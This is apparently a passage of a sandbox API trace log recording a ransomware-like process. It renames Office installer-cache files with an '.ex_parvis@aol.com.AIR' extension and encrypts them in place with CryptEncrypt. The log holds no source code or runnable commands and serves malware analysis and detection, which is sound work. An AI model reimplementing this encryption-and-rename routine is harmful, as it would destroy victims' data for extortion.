	[0096.263] WriteFile (in: hFile=0x28c, lpBuffer=0x3a1f770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a1f770*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.263] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3c20020 | out: hHeap=0x540000) returned 1
	[0096.268] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x3d30020 | out: hHeap=0x540000) returned 1
	[0096.272] CloseHandle (hObject=0x28c) returned 1
	[0096.580] GetProcessHeap () returned 0x540000
	[0096.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0096.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0096.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0096.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc178 | out: hHeap=0x540000) returned 1
	[0096.580] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc0d0 | out: hHeap=0x540000) returned 1
	[0096.580] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc0d0
	[0096.580] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0096.580] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0096.580] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.580] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.580] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1
	[0096.581] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 73
	[0096.581] GetProcessHeap () returned 0x540000
	[0096.581] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x579cd8
	[0096.581] lstrcpyW (in: lpString1=0x579cd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml"
	[0096.581] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.581] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.590] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.590] GetProcessHeap () returned 0x540000
	[0096.590] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579cd8 | out: hHeap=0x540000) returned 1
	[0096.590] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=20577) returned 1
	[0096.590] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5061
	[0096.590] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.590] GetProcessHeap () returned 0x540000
	[0096.590] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.590] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.590] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.592] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.592] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.592] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5061) returned 0x5febb8
	[0096.592] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5061) returned 0x603c28
	[0096.592] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.592] ReadFile (in: hFile=0x28c, lpBuffer=0x5febb8, nNumberOfBytesToRead=0x5061, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5febb8*, lpNumberOfBytesRead=0x3a1f778*=0x5061, lpOverlapped=0x0) returned 1
	[0096.593] SetFilePointer (in: hFile=0x28c, lDistanceToMove=-20577, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.594] WriteFile (in: hFile=0x28c, lpBuffer=0x603c28*, nNumberOfBytesToWrite=0x5061, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603c28*, lpNumberOfBytesWritten=0x3a1f778*=0x5061, lpOverlapped=0x0) returned 1
	[0096.594] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5febb8 | out: hHeap=0x540000) returned 1
	[0096.596] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603c28 | out: hHeap=0x540000) returned 1
	[0096.597] CloseHandle (hObject=0x28c) returned 1
	[0096.598] GetProcessHeap () returned 0x540000
	[0096.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0096.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0096.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0096.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc0d0 | out: hHeap=0x540000) returned 1
	[0096.598] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fc028 | out: hHeap=0x540000) returned 1
	[0096.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fc028
	[0096.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0096.598] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0096.598] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.598] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.598] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", dwFileAttributes=0x80) returned 1
	[0096.599] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 73
	[0096.599] GetProcessHeap () returned 0x540000
	[0096.599] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x579cd8
	[0096.599] lstrcpyW (in: lpString1=0x579cd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe"
	[0096.599] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.599] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.601] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.601] GetProcessHeap () returned 0x540000
	[0096.601] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x579cd8 | out: hHeap=0x540000) returned 1
	[0096.601] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1377656) returned 1
	[0096.601] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x150578
	[0096.601] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.601] GetProcessHeap () returned 0x540000
	[0096.602] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.602] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.602] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.603] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.603] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.604] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3c20020
	[0096.604] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150578) returned 0x3d80020
	[0096.604] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.604] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x150578, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x150578, lpOverlapped=0x0) returned 1
	[0096.714] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.714] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.714] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1
	[0096.715] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88
	[0096.715] GetProcessHeap () returned 0x540000
	[0096.715] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x116) returned 0x56b448
	[0096.715] lstrcpyW (in: lpString1=0x56b448, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms"
	[0096.715] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.715] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.717] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.717] GetProcessHeap () returned 0x540000
	[0096.717] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b448 | out: hHeap=0x540000) returned 1
	[0096.717] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=715834) returned 1
	[0096.717] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xaec3a
	[0096.717] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.717] GetProcessHeap () returned 0x540000
	[0096.717] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.717] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.717] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.719] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.719] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.719] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x3010020
	[0096.720] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xaec3a) returned 0x35e0020
	[0096.720] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.720] ReadFile (in: hFile=0x28c, lpBuffer=0x3010020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3010020*, lpNumberOfBytesRead=0x3a1f778*=0xaec3a, lpOverlapped=0x0) returned 1
	[0096.746] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.746] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.746] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1
	[0096.747] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75
	[0096.747] GetProcessHeap () returned 0x540000
	[0096.747] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0096.747] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll"
	[0096.747] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.747] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.749] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.749] GetProcessHeap () returned 0x540000
	[0096.749] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0096.749] GetFileSizeEx (in: hFile=0x28c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1463568) returned 1
	[0096.749] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x165510
	[0096.749] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0096.749] GetProcessHeap () returned 0x540000
	[0096.749] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0096.749] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0096.749] WriteFile (in: hFile=0x28c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0096.751] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0096.751] WriteFile (in: hFile=0x28c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0096.751] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3c20020
	[0096.751] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x165510) returned 0x3d90020
	[0096.751] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0096.751] ReadFile (in: hFile=0x28c, lpBuffer=0x3c20020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0x165510, lpOverlapped=0x0) returned 1
	[0096.813] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0096.813] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0096.813] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1
	[0096.814] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76
	[0096.814] GetProcessHeap () returned 0x540000
	[0096.814] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0096.814] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab"
	[0096.814] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0096.814] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0096.819] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c
	[0096.819] GetProcessHeap () returned 0x540000
	[0096.819] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
